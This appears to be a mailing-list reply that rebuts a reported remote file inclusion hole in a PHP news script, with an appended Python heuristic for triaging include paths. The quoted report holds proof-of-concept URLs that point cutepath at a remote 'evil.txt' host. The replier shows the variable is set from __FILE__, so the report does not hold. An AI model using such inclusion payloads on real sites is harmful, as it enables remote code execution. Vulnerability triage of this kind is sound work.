stormhacker@xxxxxxxxxxx wrote:
-----------------Description---------------
$cutepath = __FILE__;
$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
$cutepath = preg_replace( "'/search\.php'", "", $cutepath);
require_once("$cutepath/inc/functions.inc.php");
--------------PoC/Exploit----------------------
show_news.php?cutepath=http://host/evil.txt?
search.php?cutepath=http://host/evil.txt?
$cutepath = __FILE__;

$cutepath is set to the script's working directory, so you cannot set it manually.
--------------Solution---------------------
No Patch available.
As no needed? ;)

Greets,
satalin
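The check the reply makes by eye, as an added example that is not part of the original thread: a small Python heuristic that reads PHP source and reports whether a variable used in an include path is overwritten with a server-side value before the include runs. The function names and the second sample are assumptions made here; the scan is line-order only and ignores branches, functions and taint carried through other variables.

```python
import re

# Constructed sample: the search.php lines quoted in the report above.
REPORTED = r'''<?php
$cutepath = __FILE__;
$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
$cutepath = preg_replace( "'/search\.php'", "", $cutepath);
require_once("$cutepath/inc/functions.inc.php");
'''

# Constructed contrast: the same include with no assignment in front of it.
UNASSIGNED = r'''<?php
require_once("$cutepath/inc/functions.inc.php");
'''

INCLUDE_RE = re.compile(r'\b(?:require|include)(?:_once)?\b[^;]*;')
VAR_RE = re.compile(r'\$([A-Za-z_]\w*)')
REQUEST_RE = re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE)\b')


def classify(var, before):
    """Walk the assignments to $var that precede the include, in source order."""
    name = r'\$' + re.escape(var) + r'\b'
    assign = re.compile(name + r'\s*=(?!=)([^;]*);')
    # With register_globals on, an unset global can arrive from the query string.
    controllable = True
    for rhs in assign.findall(before):
        if REQUEST_RE.search(rhs):
            controllable = True       # explicitly read from the request
        elif not re.search(name, rhs):
            controllable = False      # replaced by a value not derived from itself
        # otherwise the right-hand side transforms $var: state is unchanged
    return "request-controllable" if controllable else "overwritten before include"


def triage_includes(php_source):
    """Return (variable, verdict) for every variable in an include/require path."""
    findings = []
    for m in INCLUDE_RE.finditer(php_source):
        before = php_source[:m.start()]
        for var in VAR_RE.findall(m.group(0)):
            findings.append((var, classify(var, before)))
    return findings


if __name__ == "__main__":
    for label, src in (("reported", REPORTED), ("unassigned", UNASSIGNED)):
        print(label, triage_includes(src))
```
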